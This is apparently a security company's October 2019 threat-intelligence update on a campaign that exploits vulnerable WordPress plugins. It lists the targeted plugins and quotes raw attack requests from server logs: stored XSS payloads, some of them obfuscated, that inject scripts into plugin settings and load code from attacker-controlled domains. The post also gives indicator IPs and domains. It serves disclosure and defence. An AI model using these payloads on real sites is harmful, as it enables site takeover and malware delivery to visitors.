This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:
- Multi-Vector Attack in Server Logs: March 2019
- Plugins Added to Malicious Campaign – April 2019
- Malware Campaign Evolves to Target New Plugins: May 2019
- Plugins Under Attack: June 2019
- Plugins Under Attack: July 2019
- Plugins Under Attack: August 2019
- Plugins Under Attack: September 2019
Plugins Under Attack: October 2019
- Blog Designer (New Payload)
- WPeMatico RSS Feed Fetcher
- Smart Google Code Inserter (New Payload)
- Post Custom Templates Lite (New Payload)
- Woody Ad Snippets
- FV Flowplayer Video Player
- Poll, Survey, Form & Quiz Maker
- DELUCKS SEO
- Social Metrics Tracker
Plugins that are continuing to be leveraged by attackers are:
- Rich Reviews
- Kiwi-Social-Share
- Blog Designer
- WP Live Chat Support
- Yellow Pencil Visual Theme Customizer
- Social Warfare
- Yuzo Related Post
- WP-Piwik
Plugin Payloads Added to the Campaign
Blog Designer
185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"
WPeMatico RSS Feed Fetcher
159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
Smart Google Code Inserter
192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data:text/javascript,if(document.head){	var b = document;var c = b.createEle&#...skipped...arCode(104,101,97,100))[0].appendChild(c);}'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"
Post Custom Templates Lite
192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data:text/javascript,if(document.head){	var b = document;var&...skipped...(c);}'></script> "POST /wp-admin/admin-post.php HTTP/1.1"
Woody Ad Snippets
162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"
FV Flowplayer Video Player
162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"
Poll, Survey, Form & Quiz Maker
50.63.162.9 - "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"
DELUCKS SEO
167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1"
Social Metrics Tracker
50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi HTTP/1.1"
Malicious Domains and IPs:
IPs:
159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49
Domains Injected:
- track[.]beforwardplay[.]com
- cls[.]balantfromsun[.]com
- cd[.]privacylocationforloc[.]com
- bes[.]belaterbewasthere[.]com
- ave[.]cervantes[.]es
- hungthinhsg[.]com[.]vn
We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.